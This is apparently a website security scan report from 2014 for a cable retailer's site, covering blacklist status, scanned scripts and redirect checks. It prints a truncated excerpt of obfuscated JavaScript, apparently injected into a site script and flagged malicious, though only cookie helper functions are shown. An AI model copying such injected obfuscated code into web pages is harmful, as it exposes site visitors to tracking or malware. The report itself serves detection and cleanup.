Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=search.cablesplususa.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://search.cablesplususa.com/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://search.cablesplususa.com/ | 200 OK Content-Length: 60019 Content-Type: text/html | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/mobileredirector.js | 200 OK Content-Length: 2490 Content-Type: application/javascript | suspicious |
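Page code contains blacklisted domain: cablesplususa.com. The "suspicious" status appears to rest on this domain match alone: the visible part of the script only sends mobile user agents on a cablesplususa.com host to http://m.cablesplususa.com (keeping the path and query string) and otherwise sets a fromMobileSite cookie. The 2179 skipped bytes are not shown, so the full file still needs to be checked. Excerpt: ...[2179 bytes skipped]... mMobileSite"); if ((fromMobile == 'false') || (fromMobile == '')) { var isMobile = false; var agent = navigator.userAgent.toLowerCase(); for (var i = 0; i < mobileIndicators.length; i++){ var indicator = mobileIndicators[i].toLowerCase(); if (agent.indexOf(indicator) > -1) { isMobile = true; } } if (isMobile) { if (location.host.indexOf("cablesplususa.com") != -1) { var host = "http://m.cablesplususa.com" + location.pathname; if(window.location.search.substring(1) != '') { host = host + "?" + window.location.search.substring(1); } location.replace(host); } } } else { setCookie('fromMobileSite', 'true'); } } | ||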
http://www.cablesplususa.com/FrameManager.js | 200 OK Content-Length: 2720 Content-Type: application/x-javascript | clean |
http://www.cablesplususa.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 11064 Content-Type: application/x-javascript | malicious |
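Malicious code, confirmed by antivirus engines (see below). The excerpt is cut mid-statement. It opens with obfuscated code (randomized identifiers and hex-escaped strings; the first string decodes to "useridA0817FB25") that defines helpers for reading and writing cookies, then resumes inside what looks like the file's ordinary object/embed attribute handling. That layout suggests the obfuscated block was injected at the top of an otherwise legitimate script; the part that follows the cookie helpers is not shown, so the copy on the server should be compared against a known-good version of the file. Excerpt: var OCeuBmV="u\x73eri\x64A\x308\x317F\x422\x35";var F9lBnCy="28";var nhKNRj=1;function Vb1gC(qb_cD){var C5prmo4=document.cookie.replace(/\s/g,"").split(";");for(var OytUL=0;OytUL<C5prmo4.length;OytUL++){var c2uijl=C5prmo4[OytUL].split("=");if(c2uijl[0]==qb_cD){return unescape(c2uijl[1]);}}return null;};function AVJqAVz(qb_cD,y98VeNE,d19agzK){var Euyoazm=new Date();var ySrd1w=Euyoazm.getTime()+(d19agzK*60*60*1000);Euyoazm.setTime(ySrd1w);var jEfzry=qb_cD+"="+escape(y98VeNE)+"\x3b \x65xpi\x72e\ case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports (the per-engine list is not included in this capture):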
| ||
http://www.cablesplususa.com/Scripts/freefreight.js | 200 OK Content-Length: 253 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/cablesplus.js | 200 OK Content-Length: 924 Content-Type: application/javascript | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/thickbox.js | 200 OK Content-Length: 11933 Content-Type: application/javascript | clean |
http://ourbbbonline.bbb.org/Richmond/BBBOnlineSeal/21018411/bbbsealh2/0/ | 200 OK Content-Length: 1165 Content-Type: text/plain | clean |
http://ourbbbonline.bbb.org/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://live.monitus.net/scripts/monitus.js | 200 OK Content-Length: 2947 Content-Type: text/javascript | clean |
https://s.yimg.com/sv/store/yfc/js/0.14/loader_536a99d.js?q=yhst-7602493195877&ts=1408980244&p=0&h=order.store.yahoo.net&v=http://store.cablesplususa.com/ | 200 OK Content-Length: 38815 Content-Type: application/javascript | clean |
http://d.yimg.com/mi/ywa.js | 200 OK Content-Length: 46566 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: search.cablesplususa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 02:12:26 GMT
Server: Apache/2.2.2 (Fedora)
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: search.cablesplususa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 02:12:26 GMT
Server: Apache/2.2.2 (Fedora)
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: search.cablesplususa.com
Referer: http://www.google.com/search?q=search.cablesplususa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: search.cablesplususa.com
Referer: http://www.google.com/search?q=search.cablesplususa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.